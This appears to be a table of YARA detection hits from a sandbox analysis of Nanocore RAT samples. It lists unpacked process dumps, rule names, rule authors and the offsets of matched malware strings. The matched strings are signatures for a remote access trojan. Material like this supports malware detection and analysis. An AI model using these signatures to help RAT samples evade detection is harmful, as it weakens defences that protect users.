5.2.vbc.exe.5610000.24.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x350b:$x1: NanoCore.ClientPluginHost 0x3525:$x2: IClientNetworkHost
5.2.vbc.exe.5610000.24.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x350b:$x2: NanoCore.ClientPluginHost 0x52b6:$s4: PipeCreated 0x34f8:$s5: IClientLoggingHost
6.2.opjlpsercy.exe.1c91458.4.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe38d:$x1: NanoCore.ClientPluginHost 0xe3ca:$x2: IClientNetworkHost 0x11efd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
6.2.opjlpsercy.exe.1c91458.4.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe105:$x1: NanoCore Client.exe 0xe38d:$x2: NanoCore.ClientPluginHost 0xf9c6:$s1: PluginCommand 0xf9ba:$s2: FileCommand 0x1086b:$s3: PipeExists 0x16622:$s4: PipeCreated 0xe3b7:$s5: IClientLoggingHost
6.2.opjlpsercy.exe.1c91458.4.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
6.2.opjlpsercy.exe.1c91458.4.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xe0f5:$a: NanoCore 0xe105:$a: NanoCore 0xe339:$a: NanoCore 0xe34d:$a: NanoCore 0xe38d:$a: NanoCore 0xe154:$b: ClientPlugin 0xe356:$b: ClientPlugin 0xe396:$b: ClientPlugin 0xe27b:$c: ProjectData 0xec82:$d: DESCrypto 0x1664e:$e: KeepAlive 0x1463c:$g: LogClientMessage 0x10837:$i: get_Connected 0xefb8:$j: #=q 0xefe8:$j: #=q 0xf004:$j: #=q 0xf034:$j: #=q 0xf050:$j: #=q 0xf06c:$j: #=q 0xf09c:$j: #=q 0xf0b8:$j: #=q
7.2.opjlpsercy.exe.21a7c2c.4.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x6da5:$x1: NanoCore.ClientPluginHost 0x6dd2:$x2: IClientNetworkHost
7.2.opjlpsercy.exe.21a7c2c.4.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x6da5:$x2: NanoCore.ClientPluginHost 0x7d74:$s2: FileCommand 0xc776:$s4: PipeCreated 0x6dbf:$s5: IClientLoggingHost
5.2.vbc.exe.57e0000.31.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x41ee:$x1: NanoCore.ClientPluginHost 0x422b:$x2: IClientNetworkHost
5.2.vbc.exe.57e0000.31.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x41ee:$x2: NanoCore.ClientPluginHost 0x7641:$s4: PipeCreated 0x4218:$s5: IClientLoggingHost
6.2.opjlpsercy.exe.1c80000.3.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x215e5:$x1: NanoCore.ClientPluginHost 0x21622:$x2: IClientNetworkHost 0x25155:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
6.2.opjlpsercy.exe.1c80000.3.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
6.2.opjlpsercy.exe.1c80000.3.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x2134d:$a: NanoCore 0x2135d:$a: NanoCore 0x21591:$a: NanoCore 0x215a5:$a: NanoCore 0x215e5:$a: NanoCore 0x213ac:$b: ClientPlugin 0x215ae:$b: ClientPlugin 0x215ee:$b: ClientPlugin 0x214d3:$c: ProjectData 0x21eda:$d: DESCrypto 0x298a6:$e: KeepAlive 0x27894:$g: LogClientMessage 0x23a8f:$i: get_Connected 0x22210:$j: #=q 0x22240:$j: #=q 0x2225c:$j: #=q 0x2228c:$j: #=q 0x222a8:$j: #=q 0x222c4:$j: #=q 0x222f4:$j: #=q 0x22310:$j: #=q
5.1.vbc.exe.415058.1.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe38d:$x1: NanoCore.ClientPluginHost 0xe3ca:$x2: IClientNetworkHost 0x11efd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
5.1.vbc.exe.415058.1.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe105:$x1: NanoCore Client.exe 0xe38d:$x2: NanoCore.ClientPluginHost 0xf9c6:$s1: PluginCommand 0xf9ba:$s2: FileCommand 0x1086b:$s3: PipeExists 0x16622:$s4: PipeCreated 0xe3b7:$s5: IClientLoggingHost
5.1.vbc.exe.415058.1.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
5.1.vbc.exe.415058.1.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xe0f5:$a: NanoCore 0xe105:$a: NanoCore 0xe339:$a: NanoCore 0xe34d:$a: NanoCore 0xe38d:$a: NanoCore 0xe154:$b: ClientPlugin 0xe356:$b: ClientPlugin 0xe396:$b: ClientPlugin 0xe27b:$c: ProjectData 0xec82:$d: DESCrypto 0x1664e:$e: KeepAlive 0x1463c:$g: LogClientMessage 0x10837:$i: get_Connected 0xefb8:$j: #=q 0xefe8:$j: #=q 0xf004:$j: #=q 0xf034:$j: #=q 0xf050:$j: #=q 0xf06c:$j: #=q 0xf09c:$j: #=q 0xf0b8:$j: #=q
5.2.vbc.exe.221641c.5.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x2dbb:$x1: NanoCore.ClientPluginHost 0x2de5:$x2: IClientNetworkHost
5.2.vbc.exe.221641c.5.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x2dbb:$x2: NanoCore.ClientPluginHost 0x4c6b:$s4: PipeCreated
4.2.vbc.exe.1db1458.4.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe38d:$x1: NanoCore.ClientPluginHost 0xe3ca:$x2: IClientNetworkHost 0x11efd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
4.2.vbc.exe.1db1458.4.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe105:$x1: NanoCore Client.exe 0xe38d:$x2: NanoCore.ClientPluginHost 0xf9c6:$s1: PluginCommand 0xf9ba:$s2: FileCommand 0x1086b:$s3: PipeExists 0x16622:$s4: PipeCreated 0xe3b7:$s5: IClientLoggingHost
4.2.vbc.exe.1db1458.4.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
4.2.vbc.exe.1db1458.4.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xe0f5:$a: NanoCore 0xe105:$a: NanoCore 0xe339:$a: NanoCore 0xe34d:$a: NanoCore 0xe38d:$a: NanoCore 0xe154:$b: ClientPlugin 0xe356:$b: ClientPlugin 0xe396:$b: ClientPlugin 0xe27b:$c: ProjectData 0xec82:$d: DESCrypto 0x1664e:$e: KeepAlive 0x1463c:$g: LogClientMessage 0x10837:$i: get_Connected 0xefb8:$j: #=q 0xefe8:$j: #=q 0xf004:$j: #=q 0xf034:$j: #=q 0xf050:$j: #=q 0xf06c:$j: #=q 0xf09c:$j: #=q 0xf0b8:$j: #=q
7.2.opjlpsercy.exe.415058.1.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe38d:$x1: NanoCore.ClientPluginHost 0xe3ca:$x2: IClientNetworkHost 0x11efd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
7.2.opjlpsercy.exe.415058.1.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe105:$x1: NanoCore Client.exe 0xe38d:$x2: NanoCore.ClientPluginHost 0xf9c6:$s1: PluginCommand 0xf9ba:$s2: FileCommand 0x1086b:$s3: PipeExists 0x16622:$s4: PipeCreated 0xe3b7:$s5: IClientLoggingHost
7.2.opjlpsercy.exe.415058.1.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
7.2.opjlpsercy.exe.415058.1.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xe0f5:$a: NanoCore 0xe105:$a: NanoCore 0xe339:$a: NanoCore 0xe34d:$a: NanoCore 0xe38d:$a: NanoCore 0xe154:$b: ClientPlugin 0xe356:$b: ClientPlugin 0xe396:$b: ClientPlugin 0xe27b:$c: ProjectData 0xec82:$d: DESCrypto 0x1664e:$e: KeepAlive 0x1463c:$g: LogClientMessage 0x10837:$i: get_Connected 0xefb8:$j: #=q 0xefe8:$j: #=q 0xf004:$j: #=q 0xf034:$j: #=q 0xf050:$j: #=q 0xf06c:$j: #=q 0xf09c:$j: #=q 0xf0b8:$j: #=q
5.2.vbc.exe.4430000.9.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
5.2.vbc.exe.4430000.9.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
5.2.vbc.exe.4430000.9.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
5.2.vbc.exe.4430000.9.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
7.2.opjlpsercy.exe.3173258.5.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe38d:$x1: NanoCore.ClientPluginHost 0xe3ca:$x2: IClientNetworkHost 0x11efd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
7.2.opjlpsercy.exe.3173258.5.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe105:$x1: NanoCore Client.exe 0xe38d:$x2: NanoCore.ClientPluginHost 0xf9c6:$s1: PluginCommand 0xf9ba:$s2: FileCommand 0x1086b:$s3: PipeExists 0x16622:$s4: PipeCreated 0xe3b7:$s5: IClientLoggingHost
7.2.opjlpsercy.exe.3173258.5.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
7.2.opjlpsercy.exe.3173258.5.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xe0f5:$a: NanoCore 0xe105:$a: NanoCore 0xe339:$a: NanoCore 0xe34d:$a: NanoCore 0xe38d:$a: NanoCore 0xe154:$b: ClientPlugin 0xe356:$b: ClientPlugin 0xe396:$b: ClientPlugin 0xe27b:$c: ProjectData 0xec82:$d: DESCrypto 0x1664e:$e: KeepAlive 0x1463c:$g: LogClientMessage 0x10837:$i: get_Connected 0xefb8:$j: #=q 0xefe8:$j: #=q 0xf004:$j: #=q 0xf034:$j: #=q 0xf050:$j: #=q 0xf06c:$j: #=q 0xf09c:$j: #=q 0xf0b8:$j: #=q
5.2.vbc.exe.55d0000.22.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x39eb:$x1: NanoCore.ClientPluginHost 0x3a24:$x2: IClientNetworkHost
5.2.vbc.exe.55d0000.22.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x39eb:$x2: NanoCore.ClientPluginHost 0x3b36:$s4: PipeCreated 0x3a05:$s5: IClientLoggingHost
6.2.opjlpsercy.exe.1c80000.3.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1d9e5:$x1: NanoCore.ClientPluginHost 0x1da22:$x2: IClientNetworkHost 0x21555:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
6.2.opjlpsercy.exe.1c80000.3.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
6.2.opjlpsercy.exe.1c80000.3.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x1d74d:$a: NanoCore 0x1d75d:$a: NanoCore 0x1d991:$a: NanoCore 0x1d9a5:$a: NanoCore 0x1d9e5:$a: NanoCore 0x1d7ac:$b: ClientPlugin 0x1d9ae:$b: ClientPlugin 0x1d9ee:$b: ClientPlugin 0x1d8d3:$c: ProjectData 0x1e2da:$d: DESCrypto 0x25ca6:$e: KeepAlive 0x23c94:$g: LogClientMessage 0x1fe8f:$i: get_Connected 0x1e610:$j: #=q 0x1e640:$j: #=q 0x1e65c:$j: #=q 0x1e68c:$j: #=q 0x1e6a8:$j: #=q 0x1e6c4:$j: #=q 0x1e6f4:$j: #=q 0x1e710:$j: #=q
5.2.vbc.exe.400000.1.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x215e5:$x1: NanoCore.ClientPluginHost 0x21622:$x2: IClientNetworkHost 0x25155:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
5.2.vbc.exe.400000.1.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
5.2.vbc.exe.400000.1.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x2134d:$a: NanoCore 0x2135d:$a: NanoCore 0x21591:$a: NanoCore 0x215a5:$a: NanoCore 0x215e5:$a: NanoCore 0x213ac:$b: ClientPlugin 0x215ae:$b: ClientPlugin 0x215ee:$b: ClientPlugin 0x214d3:$c: ProjectData 0x21eda:$d: DESCrypto 0x298a6:$e: KeepAlive 0x27894:$g: LogClientMessage 0x23a8f:$i: get_Connected 0x22210:$j: #=q 0x22240:$j: #=q 0x2225c:$j: #=q 0x2228c:$j: #=q 0x222a8:$j: #=q 0x222c4:$j: #=q 0x222f4:$j: #=q 0x22310:$j: #=q
5.2.vbc.exe.22115c4.4.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe75:$x1: NanoCore.ClientPluginHost 0x9a13:$x1: NanoCore.ClientPluginHost 0x19c3d:$x1: NanoCore.ClientPluginHost 0x26daf:$x1: NanoCore.ClientPluginHost 0x2d305:$x1: NanoCore.ClientPluginHost 0x332e0:$x1: NanoCore.ClientPluginHost 0x3cd53:$x1: NanoCore.ClientPluginHost 0x47187:$x1: NanoCore.ClientPluginHost 0x52171:$x1: NanoCore.ClientPluginHost 0x5df1f:$x1: NanoCore.ClientPluginHost 0x69cae:$x1: NanoCore.ClientPluginHost 0xe8f:$x2: IClientNetworkHost 0x9a3d:$x2: IClientNetworkHost 0x19c6a:$x2: IClientNetworkHost 0x26de8:$x2: IClientNetworkHost 0x2d33e:$x2: IClientNetworkHost 0x3ceb0:$x2: IClientNetworkHost 0x471c0:$x2: IClientNetworkHost 0x5218b:$x2: IClientNetworkHost 0x5df39:$x2: IClientNetworkHost 0x69ceb:$x2: IClientNetworkHost
5.2.vbc.exe.22115c4.4.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xddf:$a: NanoCore 0xe38:$a: NanoCore 0xe75:$a: NanoCore 0xeee:$a: NanoCore 0x99ee:$a: NanoCore 0x9a13:$a: NanoCore 0x9a6c:$a: NanoCore 0x19c17:$a: NanoCore 0x19c3d:$a: NanoCore 0x19c99:$a: NanoCore 0x26af7:$a: NanoCore 0x26b50:$a: NanoCore 0x26b83:$a: NanoCore 0x26daf:$a: NanoCore 0x26e2b:$a: NanoCore 0x27444:$a: NanoCore 0x2758d:$a: NanoCore 0x27a61:$a: NanoCore 0x27d48:$a: NanoCore 0x27d5f:$a: NanoCore 0x2d305:$a: NanoCore
5.2.vbc.exe.222265c.3.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x6da5:$x1: NanoCore.ClientPluginHost 0x6dd2:$x2: IClientNetworkHost
5.2.vbc.exe.222265c.3.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x6da5:$x2: NanoCore.ClientPluginHost 0x7d74:$s2: FileCommand 0xc776:$s4: PipeCreated 0x6dbf:$s5: IClientLoggingHost
7.2.opjlpsercy.exe.3346174.6.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x8ba5:$x1: NanoCore.ClientPluginHost 0x15d0e:$x1: NanoCore.ClientPluginHost 0x1c25c:$x1: NanoCore.ClientPluginHost 0x2222d:$x1: NanoCore.ClientPluginHost 0x2bc99:$x1: NanoCore.ClientPluginHost 0x360c4:$x1: NanoCore.ClientPluginHost 0x410a1:$x1: NanoCore.ClientPluginHost 0x4ce43:$x1: NanoCore.ClientPluginHost 0x6231b:$x1: NanoCore.ClientPluginHost 0x8a57d:$x1: NanoCore.ClientPluginHost 0x999bd:$x1: NanoCore.ClientPluginHost 0xb1859:$x1: NanoCore.ClientPluginHost 0xd9aa7:$x1: NanoCore.ClientPluginHost 0x8bd2:$x2: IClientNetworkHost 0x15d47:$x2: IClientNetworkHost 0x1c295:$x2: IClientNetworkHost 0x2bdf6:$x2: IClientNetworkHost 0x360fd:$x2: IClientNetworkHost 0x410bb:$x2: IClientNetworkHost 0x4ce5d:$x2: IClientNetworkHost 0x62348:$x2: IClientNetworkHost
7.2.opjlpsercy.exe.3346174.6.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
7.2.opjlpsercy.exe.3346174.6.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x8b7f:$a: NanoCore 0x8ba5:$a: NanoCore 0x8c01:$a: NanoCore 0x15a56:$a: NanoCore 0x15aaf:$a: NanoCore 0x15ae2:$a: NanoCore 0x15d0e:$a: NanoCore 0x15d8a:$a: NanoCore 0x163a3:$a: NanoCore 0x164ec:$a: NanoCore 0x169c0:$a: NanoCore 0x16ca7:$a: NanoCore 0x16cbe:$a: NanoCore 0x1c25c:$a: NanoCore 0x1c2d6:$a: NanoCore 0x20e73:$a: NanoCore 0x2222d:$a: NanoCore 0x22277:$a: NanoCore 0x22ed1:$a: NanoCore 0x2bc99:$a: NanoCore 0x2bd83:$a: NanoCore
7.2.opjlpsercy.exe.43a0000.9.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
7.2.opjlpsercy.exe.43a0000.9.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
7.2.opjlpsercy.exe.43a0000.9.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
7.2.opjlpsercy.exe.43a0000.9.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
7.2.opjlpsercy.exe.43a0000.9.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe38d:$x1: NanoCore.ClientPluginHost 0xe3ca:$x2: IClientNetworkHost 0x11efd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
7.2.opjlpsercy.exe.43a0000.9.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe105:$x1: NanoCore Client.exe 0xe38d:$x2: NanoCore.ClientPluginHost 0xf9c6:$s1: PluginCommand 0xf9ba:$s2: FileCommand 0x1086b:$s3: PipeExists 0x16622:$s4: PipeCreated 0xe3b7:$s5: IClientLoggingHost
7.2.opjlpsercy.exe.43a0000.9.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
7.2.opjlpsercy.exe.43a0000.9.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xe0f5:$a: NanoCore 0xe105:$a: NanoCore 0xe339:$a: NanoCore 0xe34d:$a: NanoCore 0xe38d:$a: NanoCore 0xe154:$b: ClientPlugin 0xe356:$b: ClientPlugin 0xe396:$b: ClientPlugin 0xe27b:$c: ProjectData 0xec82:$d: DESCrypto 0x1664e:$e: KeepAlive 0x1463c:$g: LogClientMessage 0x10837:$i: get_Connected 0xefb8:$j: #=q 0xefe8:$j: #=q 0xf004:$j: #=q 0xf034:$j: #=q 0xf050:$j: #=q 0xf06c:$j: #=q 0xf09c:$j: #=q 0xf0b8:$j: #=q
5.2.vbc.exe.57be8a4.28.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x10937:$x1: NanoCore.ClientPluginHost 0x10951:$x2: IClientNetworkHost
5.2.vbc.exe.57be8a4.28.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x10937:$x2: NanoCore.ClientPluginHost 0x13c74:$s4: PipeCreated 0x10924:$s5: IClientLoggingHost
7.2.opjlpsercy.exe.21a7c2c.4.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x8ba5:$x1: NanoCore.ClientPluginHost 0x15d5b:$x1: NanoCore.ClientPluginHost 0x1c385:$x1: NanoCore.ClientPluginHost 0x223a4:$x1: NanoCore.ClientPluginHost 0x2be5b:$x1: NanoCore.ClientPluginHost 0x362d3:$x1: NanoCore.ClientPluginHost 0x41411:$x1: NanoCore.ClientPluginHost 0x4d203:$x1: NanoCore.ClientPluginHost 0x5905e:$x1: NanoCore.ClientPluginHost 0x8bd2:$x2: IClientNetworkHost 0x15d94:$x2: IClientNetworkHost 0x1c3be:$x2: IClientNetworkHost 0x2bfb8:$x2: IClientNetworkHost 0x3630c:$x2: IClientNetworkHost 0x4142b:$x2: IClientNetworkHost 0x4d21d:$x2: IClientNetworkHost 0x5909b:$x2: IClientNetworkHost
7.2.opjlpsercy.exe.21a7c2c.4.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x8ba5:$x2: NanoCore.ClientPluginHost 0x15d5b:$x2: NanoCore.ClientPluginHost 0x1c385:$x2: NanoCore.ClientPluginHost 0x223a4:$x2: NanoCore.ClientPluginHost 0x2be5b:$x2: NanoCore.ClientPluginHost 0x362d3:$x2: NanoCore.ClientPluginHost 0x41411:$x2: NanoCore.ClientPluginHost 0x4d203:$x2: NanoCore.ClientPluginHost 0x5905e:$x2: NanoCore.ClientPluginHost 0x9b74:$s2: FileCommand 0x2cdb1:$s3: PipeExists 0xe576:$s4: PipeCreated 0x15e78:$s4: PipeCreated 0x1c4a0:$s4: PipeCreated 0x22482:$s4: PipeCreated 0x2c051:$s4: PipeCreated 0x3641e:$s4: PipeCreated 0x42446:$s4: PipeCreated 0x4efae:$s4: PipeCreated 0x5c4b1:$s4: PipeCreated 0x8bbf:$s5: IClientLoggingHost
7.2.opjlpsercy.exe.21a7c2c.4.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x8b7f:$a: NanoCore 0x8ba5:$a: NanoCore 0x8c01:$a: NanoCore 0x15aa3:$a: NanoCore 0x15afc:$a: NanoCore 0x15b2f:$a: NanoCore 0x15d5b:$a: NanoCore 0x15dd7:$a: NanoCore 0x163f0:$a: NanoCore 0x16539:$a: NanoCore 0x16a0d:$a: NanoCore 0x16cf4:$a: NanoCore 0x16d0b:$a: NanoCore 0x1c385:$a: NanoCore 0x1c3ff:$a: NanoCore 0x223a4:$a: NanoCore 0x223ee:$a: NanoCore 0x23048:$a: NanoCore 0x2be5b:$a: NanoCore 0x2bf45:$a: NanoCore 0x2cdbc:$a: NanoCore
5.2.vbc.exe.5070000.17.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x6da5:$x1: NanoCore.ClientPluginHost 0x6dd2:$x2: IClientNetworkHost
5.2.vbc.exe.5070000.17.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x6da5:$x2: NanoCore.ClientPluginHost 0x7d74:$s2: FileCommand 0xc776:$s4: PipeCreated 0x6dbf:$s5: IClientLoggingHost
5.2.vbc.exe.222265c.3.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x8ba5:$x1: NanoCore.ClientPluginHost 0x15d17:$x1: NanoCore.ClientPluginHost 0x1c26d:$x1: NanoCore.ClientPluginHost 0x22248:$x1: NanoCore.ClientPluginHost 0x2bcbb:$x1: NanoCore.ClientPluginHost 0x360ef:$x1: NanoCore.ClientPluginHost 0x410d9:$x1: NanoCore.ClientPluginHost 0x4ce87:$x1: NanoCore.ClientPluginHost 0x58c16:$x1: NanoCore.ClientPluginHost 0x8bd2:$x2: IClientNetworkHost 0x15d50:$x2: IClientNetworkHost 0x1c2a6:$x2: IClientNetworkHost 0x2be18:$x2: IClientNetworkHost 0x36128:$x2: IClientNetworkHost 0x410f3:$x2: IClientNetworkHost 0x4cea1:$x2: IClientNetworkHost 0x58c53:$x2: IClientNetworkHost
5.2.vbc.exe.222265c.3.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x8b7f:$a: NanoCore 0x8ba5:$a: NanoCore 0x8c01:$a: NanoCore 0x15a5f:$a: NanoCore 0x15ab8:$a: NanoCore 0x15aeb:$a: NanoCore 0x15d17:$a: NanoCore 0x15d93:$a: NanoCore 0x163ac:$a: NanoCore 0x164f5:$a: NanoCore 0x169c9:$a: NanoCore 0x16cb0:$a: NanoCore 0x16cc7:$a: NanoCore 0x1c26d:$a: NanoCore 0x1c2e7:$a: NanoCore 0x22248:$a: NanoCore 0x22292:$a: NanoCore 0x22eec:$a: NanoCore 0x2bcbb:$a: NanoCore 0x2bda5:$a: NanoCore 0x2cc1c:$a: NanoCore
7.2.opjlpsercy.exe.219b958.2.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x2dbb:$x1: NanoCore.ClientPluginHost 0x2de5:$x2: IClientNetworkHost
7.2.opjlpsercy.exe.219b958.2.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x2dbb:$x2: NanoCore.ClientPluginHost 0x4c6b:$s4: PipeCreated
5.2.vbc.exe.33c5116.7.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
5.2.vbc.exe.33c5116.7.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xddf:$a: NanoCore 0xe38:$a: NanoCore 0xe75:$a: NanoCore 0xeee:$a: NanoCore 0x99c2:$a: NanoCore 0x99e7:$a: NanoCore 0x9a40:$a: NanoCore 0x19bdd:$a: NanoCore 0x19c03:$a: NanoCore 0x19c5f:$a: NanoCore 0x26ab4:$a: NanoCore 0x26b0d:$a: NanoCore 0x26b40:$a: NanoCore 0x26d6c:$a: NanoCore 0x26de8:$a: NanoCore 0x27401:$a: NanoCore 0x2754a:$a: NanoCore 0x27a1e:$a: NanoCore 0x27d05:$a: NanoCore 0x27d1c:$a: NanoCore 0x2d2ba:$a: NanoCore
